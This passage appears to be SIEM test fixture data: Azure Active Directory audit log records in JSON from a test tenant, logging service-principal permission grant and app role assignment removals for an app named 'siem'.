"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908032"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "31d7436e-85aa-4aee-a945-6a0ff51ea975"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908032"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "31d7436e-85aa-4aee-a945-6a0ff51ea975"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", 